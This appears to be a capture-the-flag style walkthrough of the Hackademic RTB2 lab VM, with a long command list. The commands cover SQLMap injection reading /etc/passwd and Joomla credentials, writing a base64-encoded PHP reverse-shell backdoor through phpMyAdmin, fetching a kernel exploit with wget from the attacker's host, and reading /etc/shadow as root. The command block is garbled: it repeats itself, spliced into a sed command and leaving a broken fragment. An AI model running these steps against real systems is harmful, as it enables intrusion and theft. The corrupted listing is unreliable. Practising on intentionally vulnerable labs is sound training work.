Hackademic RTB2

Hackademic is the second challenge in a series of "boot-to-root" operating systems which has purposely designed weakness(es) built into it. The user's end goal is to interact with system using the highest user privilege they can reach.

Hackademic Logo

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Hackademic-RTB2.mp4

Method

  • Scanned network for the target [Netdiscover]
  • Port scanned the target [UnicornScan]
  • Banner grabbed the services running on the open port(s) [NMap]
  • Interacted with the web server & bypass the login screen [Firefox & Burp Proxy]
  • Decoded hidden message [Burp Proxy & Xlate]
  • 'Port knock' certain ports [Netcat]
  • Discovered & exploit an SQL injection vulnerably and download the configuration files [SQLMap]
  • Inserted a encoded web shell backdoor [Pentestmonkey's PHP-Reverse-Shell & Metasploit]
  • Escalated privileges via a vulnerable kernel version [CAN BCM exploit]
  • Accessed the 'flag' [Decoded image file]

Tools

Walkthrough

To begin the attack the target needs to be located on the network. The attacker uses "Netdiscover" as it is able to quickly list all IP's, MAC addresses and known vendors. As the attacker knows the target hasn't spoofed their MAC address and are aware they are using VMware, the attacker has successfully identified the target due to only one VMware vendor being listed.

The attacker now focuses on the target by port scanning every TCP & UDP port. "UnicornScan" shows two open ports, TCP 80 (HTTP) & UDP 5353 (MDNS), which the attacker then verifies by using "nmap". During nmap's scan the attacker takes advantage of its scripting engine to detect which service is running on what port as well as to banner grab (which could possibly identify the software being used & its version). Depending on the outcome of the scan, nmap then executes any other script(s). In this instance the http methods was detected (which shows what options are supported by the HTTP server) along with the page's title. Nmap also tries to fingerprint the operating system (Linux 2.6.17-2.6.36).

By inspecting the web service using "firefox" the attacker is able to see if any web application is running and how they can interact with it. The web server responds and presents them with a page that has a message from the target's author and a login screen.

The attacker starts "Burp Proxy" and configures it along with firefox to allow burp to interpret & monitors the traffic between the attacker and the target. When the attacker enters an incorrect login, burp is able to capture the request and response allowing for the attacker to control and repeat using burp's "repeater" function. The attacker then repeats the same incorrect login request to verify the setup and then again however alters the password to reflex 'standard/common' values to bypass login screens. Editor's note: As it turns out, there isn't a backend database powering the login. The valid credentials have been hard coded into the source code (File: /var/www/welcome/check.php - Line: 17-20). Unless it's exactly the same (including case and spaces), it will not work!

$pass_answer = "' or 1=1--'";

$pass_answer_2 = "' OR 1=1--'";

if($POST['password'] == $pass_answer or $POST['password'] == $pass_answer_2){

After bypassing the login screen, the attacker is able to see the hidden message. When analysing the message, the attacker believes that the string has been HEX encoded, however due to the "%" which separates each value, the attacker uses burp's URL to decode the message. The output of the message still looks encoded to the attacker and repeats decoding the message, using burp's HEX mode. The output produce is now (partly) 'readable'. The attacker remembered nmap reported one port as closed & due to the message repeating the phrase "knock", they start to suspect that the rest of the encoded message relates to the technique called 'port knocking'. As the rest of the encoded message uses just '0' & '1' the attacker believes the message to be encoded in a binary format and attempts to decode it. The result produced looks familiar to the attacker and recognises some values as 'html', however due to the 'formatting/markings' burp is unable to decode it. The attacker takes the binary message and adds '&#' before every binary block (8 values) and ';' at the end of them too. This signals to burp to interpret the format differently and burp handles the message as html code. Upon decoding, the attacker sees a group of four values, all less than 65535 as well as believing the message is unable to be decoded any more.

The attacker uses the web site, "paulschou.net", to simplify the decoding process and is able to decode all the messages without having to alter the format at any stage to reach the same result.

The attacker scans the closed TCP port once more and by using "netcat" the attacker is able open to a port of their choice. They create a loop to connect to each of the ports which were decoded. Afterwards they repeat the same scan as before however this time they discover that the port response is open. Nmap reports that the service is HTTP, using 'Apache httpd 2.2.14 (ubuntu)', thus the same scripts are executed. http-robots has detected that there is a /robots.txt files located and reports which folders have been forbidden to be indexed by internet spiders.

Moving back to firefox, the attacker restores its proxy configuration as burp isn't needed and tries to connect to the newly discovered web service on the non-default port and is presented with a Joomla 1.5 instance. Upon exploring the web application they try to alter requested URLs and soon discover an MySQL error.

"SQLMap" automates the procedure of database injection dramatically speeding up the attack. The attacker starts to emulate the back end database and discovers software versions, the operating system, current database, current user and if they are a database administrator. Afterwards the attacker discovers the password hash for the database administrator. Next the attacker starts to explore and view the contents of the Joomla database itself and as a result discovers the user credentials for the web application. The attacker continues using the SQL injection by viewing the configuration files for the system. They start off by locating their own local configuration files for their web service (which is in the same path as the target). Upon reading the target's contents they soon learn the location of the web root for each web service running. Using this, the attacker is able to read the configuration file which is used to store the database credentials as Joomla needs to be able to interact with the MySQL database. The attacker uses the default filename for the Joomla's configuring file and then views the contents to reveal the credentials in plain text.

"PHPMyAdmin" is a web based GUI interface to manage MySQL databases, which the attacker discovers is running on one of the web services. Using the credentials gathered from the configuration file, the attacker is able to login as the database administrator. The attacker crafts an SQL query to attempt to write a PHP file into the root web folder and then access it using firefox. The result being the attacker is able to write files and execute PHP commands.

To be able to remotely interactive with the target, the attacker chooses to use "PHP-pentest-monkey" shell. The attacker creates a clone copy to work on and edits the file with their IP address as the shell will be remotely connecting back to them (and the shell needs to know where the attacker is), altering the port as well as removing the start & end PHP statements as they will already be in place. Upon updating the file, the attacker encodes the shell using base64 via "msfvenom" as this will not affect the SQL statement which will be used to create the file. Before triggering the web shell, the attacker uses netcat again to listen on the same port used in the web shell. Once everything is in place, the attacker calls the web shell, causing the target to execute the PHP function to decode the backdoor, making a connection back to the attacker. This gives the attacker command line access to the target with the same permission as the web server.

The attacker wishes to gain deeper access into the system by escaping privileges. To do so one common method is by exploiting the kernel (this ONLY works if it is the 'correct' version!). The attacker finds the target's kernel version, searches their local copy of a public exploit database "exploit-db" and discovers a potential exploit which matches the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' at the top of the file as it would stop the file compiling (it is common with exploits to have 'shout outs' here), copies a version to their local web root folder and gives permission to the file to make sure every user has access to the file. After everything is ready the attacker then starts a web server.

Controlling the target the attacker is able to locate a folder which they have permission to write to and execute files from. Afterwards they instruct the target to download the exploit code from the attacker and compile it. Upon execution the attacker has now got root access on the target's machine.

Game over

When they explore root's personal home folder, they notice the "key" file. The attacker notices the text file extension and views the content, upon doing so; they see the message has been encoded. Due to the use of "=" at the end of the message, it is a common sign that base64 has been used. The attacker pastes the message back into burp and decodes it. Seeing the mention of "png", hints the decoded value is an image file. After using the web site "opinionatedgeek.com", to decode and download the file, the attacker checks the file signature. It appears to be a valid png file format and opens it up to reveal the 'flag/proof', indicating the end goal.

Game over...again

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.112 -p 1-65535 && us -H -mU -Iv 192.168.0.112 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.112   # Scans very quick, didn't need ETA via -v
BT -> firefox -> 192.168.0.112
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite    # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Firefox -> admin:password
// burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: admin Password: ' OR 1=1--' etc etc    # NOT 'OR 1=1--' (User can be anything)
Copy (black) test -> decoder -> url -> ASCII HEX
echo "<binary>" | sed "s/   /;netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.112 -p 1-65535 && us -H -mU -Iv 192.168.0.112 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.112   # Scans very quick, didn't need ETA via -v
BT -> firefox -> 192.168.0.112
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite    # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Firefox -> admin:password
// burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: admin Password: ' OR 1=1--' etc etc    # NOT 'OR 1=1--' (User can be anything)
Copy (black) test -> decoder -> url -> ASCII HEX
echo "<binary>" | sed "s/   /;\&#/g;s/ //g;s/^/&#/;s/$/;/"   # Somehow its do-able in burp, Just can't figure it out! =(
// Burp -> Binary -> HTML
// Firefox -> Google -> ascii convert online -> http://home2.paulschou.net/tools/xlate/ -> HEX -> HEX -> Binary
nmap -p 666 -T4 -A -v 192.168.0.112
for x in 1001 1101 1011 1001; do
   nc -z 192.168.0.112 $x
done
nmap -p 666 -T4 -A -v 192.168.0.112
// firefox -> 192.168.0.112:666  -> List of content items...
cd /pentest/database/sqlmap
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --passwords
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dbs
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --tables -D joomla
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-default
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php    # Joomla default
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/   # root yUtJklM97W
cp /pentest/backdoors/web/webshells/php-reverse-shell.php /tmp/bd.php
cd /tmp
nano +w bd.php    # edit IP address
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=bd.php
nc -lvvp 1234
sql -> select "<?php msfoutput ?>" INTO OUTFILE "/var/www/backdoor.php";
#w; last; uname -a; id; ls -lah;
#netstat -antp
#ps aux
##ls -lahR /home
uname -r

cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Privilege Escalation" | grep 2.6.3
head platforms/linux/local/14814.c
cp platforms/linux/local/14814.c /var/www/root.c
chmod 755 /var/www/root.c
/etc/init.d/apache2 start

ls -lah /
cd /tmp
wget 192.168.0.162/root.c
gcc root.c -o root
./root
whoami
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root
cat /root/Key.txt
// Burp -> Decoder -> Base64

#---Notes---
#Joomla: 1.5.22      # User: Administrator
#phpMyAdmin: 3.3.2.0
#curl http://192.168.0.112:666/phpmyadmin/changelog.php
#curl http://192.168.0.112:666/robots.txt
#curl http://192.168.0.112:666/htaccess.txt
amp;#/g;s/ //g;s/^/&#/;s/$/;/"   # Somehow its do-able in burp, Just can't figure it out! =(
// Burp -> Binary -> HTML
// Firefox -> Google -> ascii convert online -> http://home2.paulschou.net/tools/xlate/ -> HEX -> HEX -> Binary
nmap -p 666 -T4 -A -v 192.168.0.112
for x in 1001 1101 1011 1001; do
   nc -z 192.168.0.112 $x
done
nmap -p 666 -T4 -A -v 192.168.0.112
// firefox -> 192.168.0.112:666  -> List of content items...
cd /pentest/database/sqlmap
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --passwords
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dbs
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --tables -D joomla
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-default
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php    # Joomla default
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/   # root yUtJklM97W
cp /pentest/backdoors/web/webshells/php-reverse-shell.php /tmp/bd.php
cd /tmp
nano +w bd.php    # edit IP address
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=bd.php
nc -lvvp 1234
sql -> select "<?php msfoutput ?>" INTO OUTFILE "/var/www/backdoor.php";
#w; last; uname -a; id; ls -lah;
#netstat -antp
#ps aux
##ls -lahR /home
uname -r

cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Privilege Escalation" | grep 2.6.3
head platforms/linux/local/14814.c
cp platforms/linux/local/14814.c /var/www/root.c
chmod 755 /var/www/root.c
/etc/init.d/apache2 start

ls -lah /
cd /tmp
wget 192.168.0.162/root.c
gcc root.c -o root
./root
whoami
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root
cat /root/Key.txt
// Burp -> Decoder -> Base64

#---Notes---
#Joomla: 1.5.22      # User: Administrator
#phpMyAdmin: 3.3.2.0
#curl http://192.168.0.112:666/phpmyadmin/changelog.php
#curl http://192.168.0.112:666/robots.txt
#curl http://192.168.0.112:666/htaccess.txt

Notes

  • When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
  • Some mistakes in the video are more obvious.
  • Instead of using "PHP-Reverse-Shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.
  • It is worth downloading Joomla to be familiar with a default configuration.
  • The target uses DHCP to obtain an IP address.
  • The selection area to record was not in align when I recorded it.

Song(s): Martin Solveig & Dragonette - Hello & Klaas meets Haddaway - What is love (Klaas Radio Edit) & Scotty - The Black Pearl (Dave Darell Radio Edit) & Trent Reznor & Atticus Ross - In the Hall of the Mountain King (The Social Network) & Charlie Clouser - The Final Zepp

Video length: 13:47

Capture length: 64:30

Blog Post: https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/